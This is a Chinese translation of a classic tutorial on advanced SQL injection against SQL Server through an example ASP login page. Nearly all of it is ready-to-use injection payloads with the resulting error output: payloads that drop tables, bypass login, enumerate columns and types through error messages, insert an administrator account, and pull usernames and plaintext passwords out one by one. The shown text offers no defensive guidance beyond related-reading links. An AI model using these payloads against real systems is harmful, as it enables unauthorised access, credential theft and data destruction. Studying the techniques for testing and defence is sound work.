SQL Server应用程序的高级Sql注入

这里讨论的是'process_login.asp'中的创建'query string'的部分:

var sql = "select * from users where username = '" + username + "' and password = '" + password + "'";

如果用户指定了下面这样的数据：

Username: '; drop table users--
Password:

'users'表会被删除，所有用户都不能登陆。'--'是Transact-SQL(交互式SQL)的单行注释符，';'标志着一个查询的结束另一个查询的开始。用户名最后的'--'用来使这个特殊的查询无错误结束。

攻击者只要知道用户名，就可以通过以下的输入以任何用户的身份登陆：

Username: admin'--

攻击者可以通过下面的输入以用户表里的第一个用户来登陆：

Username: ' or 1=1--

...更有甚者，攻击者通过以下的输入可以以任意虚构的用户登陆：

Username: ' union select 1, 'fictional_user', 'somoe_password', 1--

因为程序相信攻击者指定的常量是数据库返回的记录集的一部分。

[通过错误信息获取信息]

这个技术是David Litchfield在一次渗透入侵测试中首先发现的，后来david写了篇关于这个技术的文章，很多作者都参考过这篇作品。这里我们讨论“错误消息”技术潜在的机制，使读者可以充分理解它并且能灵活应用。

为了操作数据库里的数据，攻击者要确定某个数据库的结构。例如：我们的"user"表是用下面的语句建立的：

create table users( id int,
username varchar(255),
password varchar(255),
privs int
)

并且插入了下面的用户：

insert into users values( 0, 'admin', 'r00tr0x!', 0xffff )
insert into users values( 0, 'guest', 'guest', 0x0000 )
insert into users values( 0, 'chris', 'password', 0x00ff )
insert into users values( 0, 'fred', 'sesame', 0x00ff )

我们假设攻击者要为自己插入一个用户，如果不知道表的结构的话，他不可能成功。即使他运气好，'priv'字段的重要性还不清楚。攻击者可能插入'1'，给自己在程序里添加了一个低权限的用户，而他的目标是管理员的权限。

对于攻击者来说幸运的是：如果程序返回错误(asp默认如此)，攻击者可以猜测整个数据库的结构，读取ASP程序连接到SQL-Server的帐号权限内可以读取的任何值。

(下面给出的使用上面提供的示例数据库和asp脚本来说明这些技术怎样实现的)

首先,攻击者要确定查询的表名和字段名。要做到这点，攻击者可以使用'select'语句的'having'子句：

username: ' having 1=1 --

这会引起下面的错误(译者注：having字句必须和GROUP BY或者聚合函数一起配合使用，否则出错)：

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.id' is
invalid in the select list because it is not contained in an aggregate
function and there is no GROUP BY clause.
/process_login.asp, line 35

所以攻击者就知道了表名和第一列的列名，他们可以通过给每列加上'group by'子句继续得到其他列名，如下：

username: ' group by users.id having 1=1 --

(结果产生这样的错误)

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'users.username'
is invalid in the select list because it is not contained in either an
aggregate function or the GROUP BY clause.
/process_login.asp, line 35

最后攻击者得到了下面的'username'：

' group by users.id, users.username, users.password, users.privs having 1=1--

这句没有错误，相当于：

select * from users where username = ''

所以攻击者知道了查询只是关于'users'表的，并且顺序使用了列'id,username,password,rpivs'。

如果攻击者能确定各列的数据类型将会很有用，可以利用类型转换错误信息来达到这一点，看下面的例子：

Username: ' union select sum(username) from users--

这利用了SQL-Server试图在确定两行是否相同之前先执行'sum'子句的特性，计算文本域的和会返回这样的信息：

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35

它告诉我们'username'字段的类型是'varchar'。相反的，如果我们试图计算数值型的字段，但结果两行的列数并不匹配：

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average
aggregate operation cannot take a varchar data type as an argument.
/process_login.asp, line 35

我们可以用这个技术来大概地确定数据库内各列的类型。

这样攻击者就可以写出一个格式完美的'insert'语句：

Username: '; insert into users values( 666, 'attacker', 'foobar', 0xffff )--

但是，这个技术的潜力不止这些。攻击者可以利用任何错误信息来暴露系统环境或者数据库信息。执行下面的语句可以得到一个标准错误信息的清单：

select * from master..sysmessages

检查这个清单可以发现很多有趣的信息。

一个特别有用的信息有关类型转换，如果你试图将一个字符串转换成整型，整个字符串的内容将会出现在错误信息里。以我们登陆页的例子来说，使用下面的'username'将会返回SQL-Server的版本以及它所在服务器操作系统的版本信息:

Username: ' union select @@version,1,1,1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug
6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise
Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ' to a column of
data type int.
/process_login.asp, line 35

这试图将内置常量'@@version'转换成整型，因为'users'表第一列是整数。

这个技术可以用来读取任何数据库的任何表的任何内容，如果攻击者对用户名和密码感兴趣，他们就可以从'users'表读用户名：

Username: ' union select min(username),1,1,1 from users where username > 'a'--

这将选出比'a'大的最小用户名,而且试图将它转换成一个整数:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'admin' to a column of data type int.
/process_login.asp, line 35

攻击者就知道'admin'帐号存在，他现在可以把他发现的用户名放进'where'子句来反复测试这行：

Username: ' union select min(username),1,1,1 from users where username > 'admin'--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'chris' to a column of data type int.
/process_login.asp, line 35

一旦攻击者确定了用户名，他就可以搜集密码；

Username: ' union select password,1,1,1 from users where username = 'admin'--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value 'r00tr0x!' to a column of data type int.
/process_login.asp, line 35

一个更“别致”的技术是将用户名和密码连接成一个单独的字符传，然后试图将它转换成整型。这将举另一种例子；Transact-SQL语句可以将字符串连接成一行而不改变他们的意义，下面的脚本将连接这些值：

begin declare @ret varchar(8000)
set @ret=':'
select @ret=@ret+' '+username+'/'+password from users where
username>@ret
select @ret as ret into foo
end

攻击者用这个'username'登陆(明显都在同一行)

Username: ';begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+username+'/'+password from users where username>@ret select @ret as ret into foo end--

这创建了一个只包含单列'ret'的表'foo'，而且把我们的字符串放在里面。通常一个低权限的用户可以在示例数据库里创建表，或者一个临时表。

之后攻击者选择查询表里的字符串，就像前面说的：

Username: ' union select ret,1,1,1 from foo--
Username: ' union select ret,1,1,1 from foo--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
/process_login.asp, line 35

然后删除这个表：

Username: '; drop table foo--

这些例子仅仅揭开了这项技术的神秘面纱，不用说，如果攻击者可以从数据库获得丰富的错误信息，他们的工作将大大的简化。

延伸阅读:
PHP+SQL注入式攻击专题连载
一些容易被忽略的SQL注入技巧
SQL注入攻击的种类和防范手段
Mysql手工注入语句(站长推荐)
一个登陆注入小示例
MySQL中SQL的单字节注入与宽字节注入